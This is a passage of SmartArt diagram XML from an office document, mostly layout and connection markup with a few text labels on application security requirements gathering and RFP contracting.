          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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5" custScaleX="30023" custScaleY="89239">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5" custScaleY="96749">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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5" custScaleX="30023" custScaleY="89365">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5" custScaleY="101015">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023" custScaleY="91387">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="77788">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023" custScaleY="89165">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="102041">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{2F80760B-CAFC-4846-A58F-E09AC74FC5DD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4AAFEA1C-0D0F-B34B-A23B-00BCE0C7AB80}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{846B9F3D-0100-664F-9893-070718EA3806}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{469E487E-F0E4-4400-AA39-3813DAC2D493}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" srcOrd="3" destOrd="0" parTransId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" sibTransId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}"/>
    <dgm:cxn modelId="{F8C64B7F-B60A-9741-85BE-D7EA2B668159}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F4310F8C-11E5-BA4B-B000-F69F3EE7507D}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{822FA58E-2B10-AA45-AAA6-D868389BD866}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="3" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{FD9C069B-4BC5-AF4E-B9A3-9EE6325C1020}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{68BBB4AA-3E44-F24F-96B7-4A0196C78FDE}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{728530B7-9AC5-084C-8F5B-7AD19EC94311}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6A3585BA-CA15-D445-B363-69657B2B32CF}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B886C4BA-2115-5941-977B-68503F3F259A}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D75BDABB-0E4D-8D48-A5FC-9B1905DA98C5}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ABA88485-4799-4A3E-A395-465F2466FC90}" srcOrd="1" destOrd="0" parTransId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" sibTransId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{0792EACF-78FE-9F4E-AB38-6E354F0CE50C}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" srcOrd="2" destOrd="0" parTransId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" sibTransId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{0D8776E4-C6E0-DD41-8284-A92422A38905}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{962AFFE9-B6FE-7E4C-82C5-DA2F105924FE}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7F2BD18E-C576-0B40-8A79-2061FD91A6AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F11C5EAC-E38F-C54D-9134-7BD35514090E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DC5835FE-E6F7-2440-AF28-03961D703AD0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C879C756-7CC5-1C40-99E3-0B4D348381F5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21C92099-A8C0-244E-98EE-3C96FB85D628}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71D2F385-7E2E-3B45-AF74-0F8027D22859}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56948B33-D647-FD4C-A028-B51AE83662FA}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B1D2250-505B-A44D-8224-82EEBBA120ED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{025B9155-C0BA-7049-91B5-A1D32F1DEB0C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1588341-F986-5342-9994-60239EC65C89}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{75076ACA-146B-9E4C-908A-32B2F24505EF}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE472279-B568-0541-AF39-066CEFB488D7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{742FA27F-6C85-1848-A1A5-23A30E3E151A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B83C7B20-BD74-EF4B-9B40-B30B1AE57D02}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45D3D10D-FD08-7746-B350-4A8B85A33536}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4DE2077D-1E41-7641-B88D-5BE8A93F9C50}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5826FA6-000D-004B-92CE-0D501786FEBD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6570E917-5502-744F-90A6-96AEB6E7F264}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A8A8AF2C-ECA9-5B4B-A4FC-6EE47F3FAD86}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
  </dgm:cxnLst>
  <dgm:bg>
    <a:noFill/>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Requirements and Resource Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Collect and negotiate the business requirements for an application with the business, including the</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>protection requirements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with</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> regard to confidentiality,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authenticity</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>integrity and availability of all data assets, and the expected business logic.</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Request for Proposals (RFP) and Contracting</a:t>
          </a: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BDF0D463-07CB-4904-B045-2FC63D99B581}">
